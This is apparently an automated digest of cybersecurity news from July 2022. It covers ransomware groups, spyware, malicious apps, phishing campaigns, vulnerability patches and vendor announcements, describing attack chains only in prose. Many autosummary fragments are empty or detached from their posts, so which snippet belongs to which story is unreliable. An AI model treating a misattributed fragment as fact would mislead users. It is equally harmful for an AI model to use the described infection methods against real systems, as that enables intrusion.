HTML attachment on QBot spam emails The ISO contains a .LNK file, a copy of "calc.exe" (Windows Calculator), and two DLL files, namely WindowsCodecs.dll and a payload named 7533.dll. "Dynatrace announced it has enhanced its analytics capabilities for modern multicloud environments by unifying its AI-powered log analytics with its digital experience monitoring (DEM) capabilities, including Session Replay. This latest enhancement to the Dynatrace platform enables development teams to automatically gain deeper insights into specific user journeys by connecting logs to the user sessions that generated them. This additional context allows teams to use the platform’s DEM capabilities to analyze relevant user sessions and behavior … More
The post Dynatrace enhances its analytics capabilities for modern multicloud environments appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @serghei, @VK_Intel, @jorntvdw, @DanielGallagher, @struppigel, @PolarToffee, @FourOctets, @Seifreed, @malwrhunterteam, @Ionut_Ilascu, @LawrenceAbrams, @demonslay335, @billtoulas, @BleepinComputer, @fwosar, @malwareforme, @AdvIntel, @AuCyble, @kaspersky, @pcrisk, @corintxt, @Amigo_A_, and @jgreigj. "Security company SonicWall released updates to address a critical SQL injection (SQLi) flaw in Analytics On-Prem and Global Management System (GMS) products. Security company SonicWall addressed a critical SQL injection (SQLi) vulnerability, tracked as CVE-2022-22280 (CVSS score 9.4), in Analytics On-Prem and Global Management System (GMS) products. “Improper Neutralization of Special Elements used in an […]
The post SonicWall fixed critical SQLi in Analytics and GMS products appeared first on Security Affairs.
"Autosummary:
"The U.S. DoJ seized $500,000 worth of Bitcoin from North Korea-linked threat actors who are behind the Maui ransomware. The U.S. Department of Justice (DoJ) has seized $500,000 worth of Bitcoin from North Korean threat actors who used the Maui ransomware to target several organizations worldwide. “The Justice Department today announced a complaint filed in […]
The post FBI seized $500,000 worth of bitcoin obtained from Maui ransomware attacks appeared first on Security Affairs.
"Autosummary:
“The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury (Treasury) are releasing this joint Cybersecurity Advisory (CSA) to provide information on Maui ransomware, which has been used by North Korean state-sponsored cyber actors since at least May 2021 to target Healthcare and Public Health (HPH) Sector organizations.” reads the advisory published by US authorties. "Autosummary:
Base64-encoded PowerShell adds scheduled task (Securonix) At this phase of the attack, the actor has already loaded the RAT and established a data exchange link, and is capable of performing the following actions: Capture screenshots using the Win32 GDI API and exfiltrate them in GZIP form. "CommScope announced that it has collaborated with Microsoft to create a converged private wireless network solution, enabling new low-latency and mobile applications to transform industrial manufacturing. CommScope successfully deployed the combined solution—using Microsoft Azure private MEC and CommScope CBRS access points—in its own manufacturing innovation center in Shakopee, Minnesota. Through this cloud-connected, low-latency private wireless network, CommScope is already improving both the operational efficiency and manufacturing agility of its facilities. This solution brings augmented reality … More
The post CommScope partners with Microsoft to help transform industrial manufacturing appeared first on Help Net Security.
"Autosummary:
"Regulation of the Internet of Things (IoT) has always been a contentious subject. Those against claim it stymies growth of a nascent industry, while those advocating for it argue it sees the adoption of industry best practices and helps establish standards. In an effort to straddle the divide, the Department for Digital, Culture, Media and Sport (DCMS) launched its Code of Practice back in 2018. Enshrined in this were 13 “Secure by Design” principles aimed … More
The post How kitemarks are kicking off IoT regulation appeared first on Help Net Security.
"Autosummary:
Baseline criteria will focus on asset identification, product configuration, data protection, interface access control, software updates, cybersecurity state awareness, documentation, information and query reception, information dissemination, and product education and awareness.The idea is to start with these controls before introducing other requirements further down the line, such as data protection, securely designed software/hardware, privacy, resilience, and user support.These cover issues including passwords and credentials, vulnerabilities and anomalies, software, secure configuration, communications, and usage of data.It differs, however, in that its recommendations are “outcome based”, no single conformity assessment will be adopted, and a single binary label has been suggested to act as a “seal of approval”. "A threat actor tracked as TA4563 is using EvilNum malware to target European financial and investment entities. A threat actor, tracked as TA4563, leverages the EvilNum malware to target European financial and investment entities, Proofpoint reported. The group focuses on entities with operations supporting foreign exchanges, cryptocurrency, and decentralized finance (DeFi). The EvilNum is a […]
The post TA4563 group leverages EvilNum malware to target European financial and investment entities appeared first on Security Affairs.
"Autosummary:
“These messages used a remote template document that analysts observed attempting to communicate with domains to install several LNK loader components, leveraging wscript to load the EvilNum payload, and a JavaScript payload that was ultimately installed on the user’s host.” reads the analysis published by Proofpoint. "Autosummary:
Via this watering hole technique, a profile of the victim"s browser, consisting of about 50 data points, is created, including details like language, timezone, screen information, device type, browser plugins, referrer, and device memory, among others. "The spyware developed by Israeli surveillance firm Candiru exploited recently fixed CVE-2022-2294 Chrome zero-day in attacks on journalists. Researchers from the antivirus firm Avast reported that the DevilsTongue spyware, developed, by Israeli surveillance firm Candiru, was used in attacks against journalists in the Middle East and exploited recently fixed CVE-2022-2294 Chrome zero-day. The flaw, which […]
The post Candiru surveillance spyware DevilsTongue exploited Chrome Zero-Day to target journalists appeared first on Security Affairs.
"Autosummary:
The flaw, which was fixed by Google on July 4, 2022, is a heap buffer overflow that resides in the Web Real-Time Communications (WebRTC) component, it is the fourth zero-day patched by Google in 2022. "Autosummary:
"ESET research shows yet again that macOS is not immune to malware – and why some users can benefit from Apple’s Lockdown Mode
The post macOS malware: myth vs. reality – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"Autosummary:
This includes US government agencies, such as the Department of Energy, Department of Homeland Security, the Department of the Treasury, the Department of Health & Human Services, the Department of Veterans Affairs, the Department of Agriculture, and many more. "Autosummary:
"Siemens Energy announces it is joining the Amazon Web Services (AWS) Partner Network (APN), a global community of partners that leverage programs, expertise, and resources to build, market, and sell customer offerings. This expanded relationship includes listing Siemens Energy’s Managed Detection and Response (MDR) industrial cyber security solution in AWS Marketplace, a digital catalog that makes it easy for customers to find, compare, and immediately start using the software and services that run on AWS. … More
The post Siemens Energy joins AWS Partner Network to provide customers with industrial cybersecurity solutions appeared first on Help Net Security.
"Autosummary:
“The energy transition relies on seamlessly connecting physical assets with digital technologies to foster innovation, reduce emissions, and improve efficiency, but this future depends on strong cybersecurity across the whole supply chain,” said Leo Simonovich, Vice President and Global Head of Industrial Cyber, Siemens Energy. "Autosummary:
"Malware targeting Linux environments surged in 2021, with a large amount of innovation resulting in new malicious code, especially in ransomwares, trojans, and botnets," Robinson said. "Autosummary:
According to its author, the new version 2.0 release was written entirely in C++ and works on Windows Vista, 7, 8, 10, and 11, featuring multi-threaded performance and a medium AV detection rate. "Autosummary:
"Autosummary:
"Autosummary:
A diagram of the attack flow: Conti ransomware attack flow on Costa Rica source:AdvIntel Post-attack: national emergency, Conti shut down According to a note on the Conti leak site, the ransom demand was initially $10 million and then increased to $20 million when Costa Rica refused to pay. "Phishing emails impersonating LinkedIn continue to make the bulk of all brand phishing attempts; according to Check Point, 45% of all email phishing attempts in Q2 2022 imitated the style of communication of the professional social media platform, with the goal of directing targets to a spoofed LinkedIn login page and collecting their account credentials. The phishers are generally trying to pique the targets’ interest with fake messages claiming that they “have appeared in X … More
The post The rise and continuing popularity of LinkedIn-themed phishing appeared first on Help Net Security.
"Autosummary:
As noted before, LinkedIn-themed phishing emails are more likely to come in the form of fake notifications about messages, contacts and searches featuring the target, occasionally even mentioning that people from specific high-profile companies have been looking at the target’s profile. "Autosummary:
"Autosummary:
"Atlassian released security updates to address a critical security vulnerability affecting Confluence Server and Confluence Data Center. Atlassian released security updates to address a critical hardcoded credentials vulnerability in Confluence Server and Data Center tracked as CVE-2022-26138. A remote, unauthenticated attacker can exploit the vulnerability to log into unpatched servers. Once installed the Questions for Confluence […]
The post Atlassian patched a critical Confluence vulnerability appeared first on Security Affairs.
"Autosummary:
The affected versions are: Questions for Confluence 2.7.x 2.7.34 2.7.35 Questions for Confluence 3.0.x 3.0.2 The company pointed out that uninstalling the Questions for Confluence app does not solve this vulnerability because the disabledsystemuser account is not removed after the app has been uninstalled. "Autosummary:
"The collected information includes the victim’s language, timezone, screen information, device type, browser plugins, referrer, device memory, cookie functionality, and more," explains Avast"s report. "Researchers discovered a previously undetected malware dubbed ‘Lightning Framework’ that targets Linux systems. Researchers from Intezer discovered a previously undetected malware, tracked as Lightning Framework, which targets Linux systems. The malicious code has a modular structure and is able to install rootkits. “Lightning Framework is a new undetected Swiss Army Knife-like Linux malware that has […]
The post Lightning Framework, a previously undetected malware that targets Linux systems appeared first on Security Affairs.
"Autosummary:
The framework is composed of a downloader and a core module, it could expand its capabilities using a number of plugins, some of them are open-source tools. Researchers from Intezer discovered a previously undetected malware, tracked as Lightning Framework, which targets Linux systems. "Autosummary:
What"s new in Windows 10 KB5015882 The Windows 10 KB5015882 cumulative update preview includes 20 improvements or fixes, with the highlighted ones listed below: New! "Senet and Iota Communications announced a partnership to deliver LoRaWAN through both 915 MHz unlicensed spectrum and through IotaComm’s 800 MHz FCC-licensed spectrum network connectivity. The initial use cases will be focused on Smart Building, Smart City, and Critical Infrastructure applications. With this collaboration, and in addition to its use of the Senet platform for application and device management, IotaComm has also become a Senet Radio Access Network (RAN) operator and Senet LPWAN Virtual Network … More
The post Senet collaborates with Iota Communications to deliver wireless networks for smart infrastructure sensors appeared first on Help Net Security.
"Autosummary:
Through a combination of sensors, meters, and its Delphi360 wireless connectivity and data analytics platform, IotaComm provides an end-to-end smart building and smart city solution used by building managers, industrial site managers, and city planners to better manage the health, safety, and sustainability goals of their organizations and facilities. "Malwarebytes Endpoint Detection and Response can fight—and defeat—advanced ransomware that other security solutions miss. In this post, we’ll walk through what it looks like to deal with a ransomware attack using Malwarebytes EDR.
The post Demo: Your data has been encrypted! Stopping ransomware attacks with Malwarebytes EDR appeared first on Malwarebytes Labs.
"Autosummary:
What worse, ransomware gangs have increased their attacks on a range of vulnerable industries, with disruptions to business operations, million-dollar ransom demands, data exfiltration, and extortion. Accelerate and simplify your ransomware defense with Malwarebytes EDR In this post, we seamlessly looked at the activity that ransomware exhibited, found a recovery plan for it, then implemented that plan. Part 4: Remediating the ransomware Below, we see a process here with a large amount of file activity, namely file renames. Part 3: Isolating the endpoint infected with ransomware Now, as we’re continuing our investigation, we’re looking at this and deciding it looks pretty suspicious – it’s probably unwanted or a potentially damaging activity. So for example, if we hover over the disable Windows Firewall behavior that we saw, on the left, you’ll see that we’ve been partnering with the MITRE foundation and using its attack framework to give you context and a common set of terms that you can use to identify and understand these tactics. "Autosummary:
Luna ransomware command-line arguments (Kaspersky) Rust-based cross-platform ransomware The group behind this new ransomware developed this new strain in Rust and took advantage of its platform-agnostic nature to port it to multiple platforms with very few changes to the source code. "In some countries up to 90% of governmental websites add third-party tracker cookies without users’ consent. This occurs even in countries with strict user privacy laws, according to researchers Matthias Götze (TU Berlin), Srdjan Matic (IMDEA Software), Costas Iordanou (Cyprus University of Technology), Georgios Smaragdakis (TU Delft) and Nikolaos Laoutaris (IMDEA Networks). This Help Net Security video shows how nearly all governmental websites serve cookies or third-party trackers without any consent from users.
The post Up to 90% of governmental websites serve cookies or third-party trackers appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The top countries with the most users include Chile, Australia, Mexico, Ukraine, Russia, Morocco, Venezuela, Brazil, Poland, Italy, Indonesia, Uzbekistan, and South Africa. "Autosummary:
"Cryptocurrency has always been the payment method of choice for bad guys. Get hit with an enterprise ransomware attack and plan to pay? You’ll need crypto. The key reason cyberthieves love cryptocurrency so much is that it is far harder to trace payments.
That is why a move being attempted by the European Union has so much potential. The EU — in a move that will likely be mimicked by many other regional regulatory forces, including in the United States — is putting in place tracking requirements for all cryptocurrency.
If it is successful, and the EU has an excellent track record on precisely these kinds of changes, cryptocurrency may quickly fade as the thief’s payment of choice.
Autosummary:
By the way, the EU in this document also listed “non-cooperative jurisdictions for tax purposes,” which include American Samoa, Fiji Guam, Palau, Panama, Samoa, Trinidad, Tobago, the U.S. Virgin Islands, and Vanuatu. That all said, cryptocurrency exchanges are, sort of, mostly legal operations. "Autosummary:
"Autosummary:
We’re seeing this in terms of how they recruit, too – going after other threat actors and holding, essentially, recruitment events not that different from what you might expect from big Silicon Valley companies (though obviously a bit more underground).The bureau identified at least 16 attacks by Conti ransomware against U.S. healthcare and First Responder networks, including emergency medical services, law enforcement agencies and 9-1-1 dispatch centers last year. "Autosummary:
Tech Support Scam shown by Google ad for Youtube Source: BleepingComputer For those using VPNs, the good news is that the scam sites will check if you are running a VPN and, if so, redirect users to the legitimate YouTube site. "Autosummary:
"This vulnerability exists because SSL server certificates are not validated when Cisco Nexus Dashboard is establishing a connection to Cisco Application Policy Infrastructure Controller (APIC), Cisco Cloud APIC, or Cisco Nexus Dashboard Fabric Controller, formerly Data Center Network Manager (DCNM) controllers," the company added in a separate advisory. "Autosummary:
Google Calendar spam examples (BleepingComputer) Phishing campaigns that can reach massive numbers of targets While, for many, invitation spam might seem to be a harmless issue, spam calendar events can be used to redirect targets to phishing landing pages via malicious URLs. "Autosummary:
Amazon phishing page (Check Point) LinkedIn phishing As Check Point explains in its report, phishing campaigns using fake LinkedIn emails try to mimic common messages from the platform to its users, such as “You appeared in 8 searchers this week”, or “You have one new message.” "The Justice Department announced it was able to forfeit ransomware payments made by health care organizations in Kansas and Colorado.
The post Another ransomware payment recovered by the Justice Department appeared first on Malwarebytes Labs.
"Autosummary:
Maui ransomware Deputy Attorney General Lisa O. Monaco said at the International Conference on Cyber Security: “Thanks to rapid reporting and cooperation from a victim, the FBI and Justice Department prosecutors have disrupted the activities of a North Korean state-sponsored group deploying ransomware known as ‘Maui.’” Malwarebytes recently reported on the North Korean APT that targets US healthcare sector with Maui ransomware. Although Maui may be a little different from run-of-the-mill ransomware, the steps to protect against it are not: Maintain offsite, offline backups of data and test them regularly. "Autosummary:
Other malicious apps, which have since been removed from the Google Play Store, include: Vlog Star Video Editor (1 million installs) Creative 3D Launcher (1 million installs) "Autosummary:
The seller claims that this database contains the account information of over 69 million members, including members" usernames, names, email addresses, zip code, date of birth, gender, country, an initial registration email, and other site/game-related information. "Listen to Cameron Camp, Juraj Jánošík, and Filip Mazán discuss the use of machine learning in cybersecurity, followed by Cameron’s insights into the security of medical devices
The post ESET Research Podcast: Hot security topics at RSA or mostly hype? appeared first on WeLiveSecurity
"Autosummary:
"Kaspersky researchers discovered a new ransomware family written in Rust, named Luna, that targets Windows, Linux, and ESXi systems. Researchers from Kaspersky Lab detailed a new ransomware family named Luna, which is written in Rust and is able to target Windows, Linux, and ESXi systems. Luna ransomware is the third ransomware family that is written […]
The post New Luna ransomware targets Windows, Linux and ESXi systems appeared first on Security Affairs.
"Autosummary:
The move aims at expanding potential targets, the support for VMware ESXi was already implemented by many ransomware families, including LockBit, HelloKitty, BlackMatter, and REvil. "A Panaseer survey of global insurers across the UK and US found that 82% are expecting the rise in premiums to continue, with 74% of insurers agreeing that their inability to accurately understand a customer’s security posture is impacting price increases. Insurers also see the increasing cost of ransomware as a leading factor (78%) affecting premium rises, with largest ransom pay-outs by insurers in the last two years averaging £3.26m in the UK and $3.52m … More
The post 82% of global insurers expect the rise in cyber insurance premiums to continue appeared first on Help Net Security.
"Autosummary:
This is closely followed by security awareness (36%), along with application security (32%), vulnerability management (31%), privileged access management (31%) and patch management (30%), highlighting that insurers expect to see evidence of a layered, multi-faceted approach to cybersecurity. "Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 companies worldwide, has registered an increase in malicious activity targeting law enforcement agencies at the beginning of Q2 2022. This Help Net Security video highlights how cyber attacks affect law enforcement agencies worldwide.
The post Cybercriminals targeting law enforcement agencies worldwide appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Coper is "capable of intercepting and sending SMS text messages, making USSD (Unstructured Supplementary Service Data) requests to send messages, keylogging, locking/unlocking the device screen, performing overly attacks, preventing uninstalls and generally allowing attackers to take control and execute commands on infected device via remote connection with a C2 server," the researchers said. "Google blocked dozens of malicious apps from the official Play Store that were spreading Joker, Facestealer, and Coper malware families. Google has removed dozens of malicious apps from the official Play Store that were distributing Joker, Facestealer, and Coper malware families. Researchers from security firms Pradeo discovered multiple apps spreading the Joker Android malware. The […]
The post Several apps on the Play Store used to spread Joker, Facestealer and Coper malware appeared first on Security Affairs.
"Autosummary:
“Once downloaded, this app unleashes the Coper malware infection which is capable of intercepting and sending SMS text messages, making USSD (Unstructured Supplementary Service Data) requests to send messages, keylogging, locking/unlocking the device screen, performing overly attacks, preventing uninstalls and generally allowing attackers to take control and execute commands on infected device via remote connection with a C2 server.” continues the report. "Autosummary:
For instance, they could exploit the Microsoft-discovered powerdir flaw (CVE-2021-30970), Time Machine mounts (CVE-2020-9771), environment variable poisoning (CVE-2020-9934), or a bundle conclusion issue (CVE-2021-30713). "Scammers have created a PayPal phishing campaign that extensively asks for sensitive information, including government IDs and headshot photos.
The post PayPal phishing campaign goes after more than just your login credentials appeared first on Malwarebytes Labs.
"Autosummary:
(Source: Akamai) Next, the scammers then ask users for yet more information, specifically their ATM PIN, social security number (SSN), and their mother’s maiden name—a bit of detail that could bypass an additional security layer for an account. (Source: Akamai) The PayPal phishing site then encourages users to link an email address to their PayPal account, giving the attackers a token, and therefore access, to that email account. "Autosummary:
Take this, for instance: What’s unusual about this piece of comment spam, is that it’s not shilling dodgy medications, an essay-writing service, or foot fetish videos, but a website from EC-Council, a “legitimate” cybersecurity organisation. "Autosummary:
Black Basta leaked 20% of the stolen files Bleeping Computer has seen samples of email communication, user credentials, employee contact information, production documents, and ID scans. "Autosummary:
In related news, in July 2021, President Joe Biden warned that cyberattacks leading to severe security breaches could lead to a "real shooting war," a statement issued a month after NATO said that cyberattacks could be compared to "armed attacks" in some circumstances. "Conceal announced a partnership with Carahsoft to protect government agencies from ransomware using the Conceal Platform which incorporates intelligence-grade, zero trust technology. “Conceal has developed a powerful new approach to ransomware protection that uses isolation to prevent malware from targeting an organization’s users and infrastructure, and executing on endpoints,” said Craig P. Abod, Carahsoft President. “This partnership allows Carahsoft and our reseller partners to provide our Government customers with unprecedented security for their end users, … More
The post Conceal and Carahsoft join forces to protect government customers from ransomware appeared first on Help Net Security.
"Autosummary:
"Increased cyber threats and government directives have made cybersecurity a top priority among critical infrastructure organizations. A zero trust security architecture is the gold standard for blocking and containing threats, but there’s been heavy skepticism around the practicality of implementing zero trust in operational technology (OT) environments with the mix of legacy and modern equipment. A study from Wakefield Research suggests that despite this skepticism, industrial cybersecurity leaders are making significant progress. The survey conducted … More
The post Industrial cybersecurity leaders are making considerable headway appeared first on Help Net Security.
"Autosummary:
Tactics for accelerating implementations include integrating zero trust into organizational culture (68%); incorporating Identify and Access Management (IAM) practices or tools (66%), while avoiding “rip and replace” of existing networks and systems; setting a formal process to define zero trust goals (60%); assessing weakness in existing OT security architecture (60%). "A threat actor is targeting industrial engineers and operators with trojanized password-cracking software for programmable logic controllers (PLCs) and human-machine interfaces (HMIs), exploiting their pressing needs to turn industrial workstations into dangerous bots. According to Dragos researchers, the adversary seems not to be interested in disrupting industrial processes but making money. The password-cracking software also carries a dropper that infects the machine with Sality malware, which: Uses process injection and file infection to achieve persistence … More
The post Beware of password-cracking software for PLCs and HMIs! appeared first on Help Net Security.
"Autosummary:
These appear to be tailor-made to work on PLCs and HMIs by AutomationDirect, Omron, Siemens, ABB, Delta Automation, Fuji Electric, Mitsubishi Electric, Pro-Face, Vigor Electric, Weintek, Allen-Bradley, Panasonic, Fatek, IDEC Corp., and LG. "Autosummary:
The APK executes and mimics a Chrome installation, requesting risky permissions such as SMS interception, making phone calls, reading and writing storage, handling system alerts, getting accounts list, and more. "We take a look at reports of organised review bombing, leading to extortion threats to get the negative ratings removed.
The post Extortionists target restaurants, demand money to take down bad reviews appeared first on Malwarebytes Labs.
"Autosummary:
No matter which rules you feel that your extortion-laced missives fall under, here’s how to report in both Maps and Search: Flag a review in Google Maps On your computer, open Google Maps.Posted: July 18, 2022 by We take a look at reports of organised review bombing, leading to extortion threats to get the negative ratings removed. "In its ongoing effort to improve the security posture of federal, state and local government agencies, SecurityScorecard announced a partnership with The National Association of Counties (NACo). Through this partnership, U.S. county governments will gain access to SecurityScorecard’s cybersecurity ratings platform to monitor and improve cybersecurity risk. NACo successfully piloted SecurityScorecard’s cybersecurity ratings platform, which involved 38 counties. SecurityScorecard’s platform is now available in the NACo County Tech Xchange, an online portal that connects more … More
The post SecurityScorecard partners with NACo to improve cybersecurity posture for U.S. county governments appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Fortunately, some solutions – such as Intruder Vanguard - take a faster, more proactive approach, finding the proof-of-concept exploit, breaking it down, and then checking all its customers - often before the scanning vendors have started their checks. To avoid this, you need a solution that takes into account your specific environment i.e., the types of systems you have deployed, the configuration of these systems, the data stored within them, and the mitigating controls you have in place. "Autosummary:
"Autosummary:
Lag Time in Discovery and App Removal The eight apps in which Ingrao discovered Autolycos are: Vlog Star Video Editor (com.vlog.star.video.editor) – 1 million downloads Creative 3D Launcher (app.launcher.creative3d) – 1 million downloads Wow Beauty Camera (com.wowbeauty.camera) – 100,000 downloads Gif Emoji Keyboard (com.gif.emoji.keyboard) – 100,000 downloads Freeglow Camera 1.0.0 (com.glow.camera.open) – 5,000 downloads Coco Camera v1.1 (com.toomore.cool.camera) – 1,000 downloads Funny Camera by KellyTech – 500,000 downloads Razer Keyboard & Theme by rxcheldiolola – 50,000 downloads. After the apps with Joker were installed, they would show a “splash” screen, which would display the app logo, to throw off victims while performing various malicious processes in the background, such as stealing SMSes and contact lists as well as performing ad fraud and signing people up for subscriptions without their knowledge. "Autosummary:
The recommendation is directed at federal agencies and concerns CVE-2022-22047, a vulnerability that carries a CVSS score of high (7.8) and exposes Windows Client Server Runtime Subsystem (CSRSS) used in Windows 11 (and earlier versions dating back to 7) and also Windows Server 2022 (and earlier versions 2008, 2012, 2016 and 2019) to attack. "A synchronized criminal attack from abroad hit Albania over the weekend, all Albanian government systems shut down following the cyberattack. Albania was hit by a massive cyberattack over the weekend, the government confirmed on Monday. A synchronized criminal attack from abroad hit the servers of the National Agency for Information Society (AKSHI), which handles many […]
The post A massive cyberattack hit Albania appeared first on Security Affairs.
"Autosummary:
Most of the desk services for the population were interrupted, and only several important services, such as online tax filing, are still working because they are provided by servers not targeted in the attack. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Dealing with threats and preventing sensitive data loss Recently, Normalyze, a data-first cloud security platform, came out of stealth with $22.2M in Series A funding. This was the perfect time to catch up with co-founder and CEO Amer Deeba. In this interview with Help Net Security, he talks about the path data security as well as visibility challenges. Who are … More
The post Week in review: Kali Linux gets on Linode, facial recognition defeated, Log4j exploitation appeared first on Help Net Security.
"Autosummary:
How attackers abuse Quickbooks to send phone scam emails In this Help Net Security video, Roger Kay, VP of Security Strategy, INKY, talks about how this time around, attackers impersonated reputable retail brands such as Amazon, Apple, and Paypal, to send out legitimate notifications from QuickBooks, an accounting software package used primarily by small business and midmarket customers who lack in-house expertise in finance and accounting. New infosec products of the week: July 15, 2022 Here’s a look at the most interesting products from the past week, featuring releases from Deloitte, Flashpoint, CertiK, CyberArk, and N-able. "Autosummary:
"Autosummary:
"Threat actors are targeting VoIP servers by exploiting a vulnerability in Digium’s software to install a web shell, Palo Alto Networks warns. Recently, Unit 42 researchers spotted a campaign targeting the Elastix system used in Digium phones since December 2021. Threat actors exploited a vulnerability, tracked as CVE-2021-45461 (CVSS score 9.8), in the Rest Phone Apps (restapps) module to implant […]
The post Threat actors exploit a flaw in Digium Phone Software to target VoIP servers appeared first on Security Affairs.
"Autosummary:
The malicious campaign has many similarities to the INJ3CTOR3 report detailed by Check Point Research in 2020 two years ago, experts speculate it could be a resurgence of this campaign The attack chains start with a code retrieving a shell script dropper from a remote server, which, in turn, downloads and executes obfuscated PHP backdoor in multiple locations in the file system. "ChaosSearch announced enhancements to its log analytics capabilities that make it easier for organizations to conduct exploratory and investigative analytics at scale. Built within the ChaosSearch Cloud Data Platform and now available to all customers, the augmented capabilities eliminate the architectural complexity and challenges created by traditional data platforms and dramatically improve time to insights, data reliability, and cost. The amount and variety of data being generated by businesses has grown exponentially in the last … More
The post ChaosSearch enhances log analytics capabilities to eliminate architectural complexity challenges appeared first on Help Net Security.
"Autosummary:
“If you’re using any of the existing database platforms today, there is simply no way you’re looking at more than one day’s worth of data at a time without an astronomical price tag,” said Thomas Hazel, Founder, CTO, Chief Scientist, ChaosSearch. "Samsung announced that it has begun sampling the 16-gigabit (Gb) Graphics Double Data Rate 6 (GDDR6) DRAM featuring 24-gigabit-per-second (Gbps) processing speeds. Built on Samsung’s third-generation 10-nanometer-class (1z) process using extreme ultraviolet (EUV) technology, the new memory is designed to significantly advance the graphics performance for next-generation graphics cards (Video Graphics Arrays), laptops and game consoles, as well as artificial intelligence-based applications and high-performance computing (HPC) systems. “The explosion of data now being driven by … More
The post Samsung introduces 24Gbps GDDR6 DRAM to advance next-generation graphics cards appeared first on Help Net Security.
"Autosummary:
"In the first half of 2022, BioCatch estimates fraudulent transfers to money mule accounts totaled $3 billion and that there are approximately 2 million mule accounts in the US. Additionally, researchers found that the average mule transaction amount is $1,500 – a low amount to avoid detection when executing mule campaigns at a large scale. In this Help Net Security video, Erin Englund, Threat Analytics Lead at BioCatch, explains what money mules are, why are … More
The post The proliferation of money mules and how behavioral biometrics can combat this form of fraud appeared first on Help Net Security.
"Autosummary:
"“Vulnerable instances of Log4j will remain in systems for many years to come, perhaps a decade or longer,” the Cyber Safety Review Board (CSRB) has concluded. Log4j exploitation: Risk and effects of remediation efforts The report concentrates on Log4Shell and other vulnerabilities that were discovered (and exploited) last year in the open-source Log4j library. While cybersecurity vendors continue to flag attacks involving Log4Shell exploitation, “the Board also found that to date, generally speaking, exploitation of … More
The post How to address the ongoing risk of Log4j exploitation and prepare for the future appeared first on Help Net Security.
"Autosummary:
The CSRB’s analysis of the entire Log4j event has allowed them to formulate recommendations for various government and private sector stakeholders for: Addressing the continued risk of Log4j exploitation Improving vulnerability management and security hygiene Building a better software ecosystem, and Make necessary cultural and technological changes to improve US digital security in the long run Luta Security CEO Katie Moussouris, a cybersecurity leader and member of the CSRB, has summarized the lessons organizations, software makers and open-source maintainers can learn from this report. "Autosummary:
" The ransomware threat evolves in a post-Conti world The development also comes as the ransomware landscape is evolving with existing and new ransomware groups, namely LockBit, Hive, Lilith, RedAlert (aka N13V), and 0mega, even as the Conti gang formally shuttered its operations in response to a massive leak of its internal chats. "Cyble researchers warn of three new ransomware operations named Lilith, RedAlert and 0mega targeting organizations worldwide. Researchers from threat intelligence firm Cyble warn of new ransomware gangs that surfaced recently, named Lilith, RedAlert, and 0mega. RedAlert (aka N13V) targets both Windows and Linux VMWare ESXi servers of target organizations. The name RedAlert comes after a string […]
The post RedAlert, LILITH, and 0mega, 3 new ransomware in the wild appeared first on Security Affairs.
"Autosummary:
The ransomware targets a limited types of files, including log files (.log), swap files(.vswp), virtual disks(.vmdk), snapshot files (.vmsn) and memory files(.vmem) of VMware ESXi virtual machines. Researchers from threat intelligence firm Cyble warn of new ransomware gangs that surfaced recently, named Lilith, RedAlert, and 0mega. "Microsoft researchers linked the Holy Ghost ransomware (H0lyGh0st) operation to North Korea-linked threat actors. The Microsoft Threat Intelligence Center (MSTIC) researchers linked the activity of the Holy Ghost ransomware (H0lyGh0st) operation to a North Korea-linked group they tracked as DEV-0530. The Holy Ghost ransomware gang has been active since June 2021 and it conducted ransomware […]
The post Holy Ghost ransomware operation is linked to North Korea appeared first on Security Affairs.
"Autosummary:
The Microsoft Threat Intelligence Center (MSTIC) researchers linked the activity of the Holy Ghost ransomware (H0lyGh0st) operation to a North Korea-linked group they tracked as DEV-0530. "Autosummary:
Advertised on various social media platforms, the password recovery tools promise to unlock PLC and HMI (human-machine interface) terminals from Automation Direct, Omron, Siemens, Fuji Electric, Mitsubishi, LG, Vigor, Pro-Face, Allen Bradley, Weintek, ABB, and Panasonic. "Autosummary:
The group has successfully compromised small-to-mid-sized businesses—including manufacturing organizations, banks, schools, and event and meeting planning companies—in multiple countries starting as early as September, researchers from MTIC and Microsoft Digital Security Unit (MDSU) said in a blog post published Thursday. Later in the group’s evolution, between October 2021 and May 2022, MSTIC observed a cluster of new DEV-0530 ransomware variants written in Go, which they classify as SiennaBlue variants, they said. "Dragos researchers uncovered a small-scale campaign targeting industrial engineers and operators with Sality malware. During a routine vulnerability assessment, Dragos researchers discovered a campaign targeting industrial engineers and operators with Sality malware. Threat actors behind the campaign used multiple accounts across several social media platforms to advertise password-cracking software for Programmable Logic Controller (PLC), Human-Machine […]
The post Tainted password-cracking software for industrial systems used to spread P2P Sality bot appeared first on Security Affairs.
"Autosummary:
The password recovery software is advertised as working against industrial systems from ABB, Allen Bradley, Automation Direct, Fuji Electric, LG, Vigor, Mitsubishi, Omron, Panasonic, Pro-Face, Siemens, and Weintek. "Catalogic Software released the newest version of Catalogic DPX, the company’s enterprise data protection software. DPX 4.8.1 introduces GuardMode, a feature providing early detection of ransomware and DPX vPlus, cloud data protection for Microsoft 365 and other open virtualization platforms. “Cybercriminals are constantly innovating, costing US victims $49.2 million in losses to ransomware attacks last year alone – and that is just based on incidents reported to the FBI,” said Krista Macomber, Senior Analyst, Evaluator … More
The post Catalogic DPX 4.8.1 strengthens ransomware protection for customers appeared first on Help Net Security.
"Autosummary:
With DPX vPlus, Catalogic provides data protection for Microsoft 365, and other open virtualization platforms such as RHV/oVirt, Acropolis, XenServer, Oracle VM and KVM. "Kudelski IoT launched its Secure IP portfolio, giving semiconductor manufacturers robust cryptographic capabilities when integrated into their system on chip (SoC) products. Companies benefit from a rich array of security services, which are more powerful integrated in hardware than software, while also enabling compliance with most common industry security standards including NIST, FIPS, PSA and SESIP Level 3 or higher. “Silicon hardware-based security offers better protection from manipulation and interference than its software-based counterpart because … More
The post Kudelski IoT Secure IP increases hardware security for semiconductor manufacturers appeared first on Help Net Security.
"Autosummary:
